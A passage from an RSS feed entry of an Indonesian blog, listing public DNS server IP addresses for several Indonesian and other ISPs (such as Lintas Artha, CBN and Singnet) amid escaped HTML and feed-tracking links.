208.67.220.220&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Simaya&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;115.178.55.22&lt;br /&gt;
115.178.55.33&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;awar&lt;a href="http://wxyz.web.id/" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #cc0000; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none; vertical-align: baseline;"&gt;i&lt;/a&gt;&lt;br /&gt;
203.142.83.200&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;singnet&lt;br /&gt;
165.21.83.88&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;lintas artha&lt;br /&gt;
202.152.0.2&lt;br /&gt;
202.152.5.36&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;cbn&lt;br /&gt;
202.158.3.7&lt;br /&gt;
202.158.3.6&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;vnsc&lt;br /&gt;
4.2.2.1&lt;br /&gt;
4.2.2.2&lt;br /&gt;
4.2.2.3&lt;br /&gt;
4.2.2.4&lt;br /&gt;
4.2.2.5&lt;br /&gt;
4.2.2.6&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;203.142.83.200&lt;br /&gt;
203.34.118.10&lt;br /&gt;
203.34.118.12&lt;br /&gt;
202.152.0.2&lt;br /&gt;
202.152.5.36&lt;br /&gt;
202.158.3.7&lt;br /&gt;
202.158.3.6&lt;br /&gt;
202.134.0.155&lt;br /&gt;
202.134.2.5&lt;/div&gt;&lt;div class="snap_nopreview sharing robots-nocontent" style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;ul style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; float: left; font-family: inherit; font-size: 12px; font-style: inherit; list-style-image: none !important; list-style-position: outside !important; list-style-type: none !important; margin-bottom: 0px !important; margin-left: 0px; margin-right: 0px !important; margin-top: 0px !important; padding-bottom: 0px; padding-left: 10px; padding-right: 0px; padding-top: 0px; text-indent: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="line-height: 24px;"&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;
&lt;li class="share-twitter share-regular" style="background-attachment: initial !important; background-clip: initial !important; background-color: initial !important; background-image: none !important; background-origin: initial !important; border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; display: list-item !important; float: left; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; line-height: 21px; list-style-image: none !important; list-style-position: outside !important; list-style-type: none !important; margin-bottom: 8px; margin-left: 10px; margin-right: 0px; margin-top: 7px; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 10px !important; vertical-align: baseline;"&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3900780076543133178-7946023085854296321?l=sxcode.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=tcE0cG_52oY:wTHzSo04Je8:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:YwkR-u9nhCs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=YwkR-u9nhCs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=tcE0cG_52oY:wTHzSo04Je8:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=tcE0cG_52oY:wTHzSo04Je8:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:KwTdNBX3Jqk"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=tcE0cG_52oY:wTHzSo04Je8:KwTdNBX3Jqk" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:l6gmwiTKsz0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=l6gmwiTKsz0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=tcE0cG_52oY:wTHzSo04Je8:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=tcE0cG_52oY:wTHzSo04Je8:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityBlog/~4/tcE0cG_52oY" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-27T00:15:21.022-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://sxcode.blogspot.com/2011/07/daftar-dns-isp-internet-service.html</feedburner:origLink></item><copyright>by skygear</copyright><media:rating>nonadult</media:rating></channel></rss>

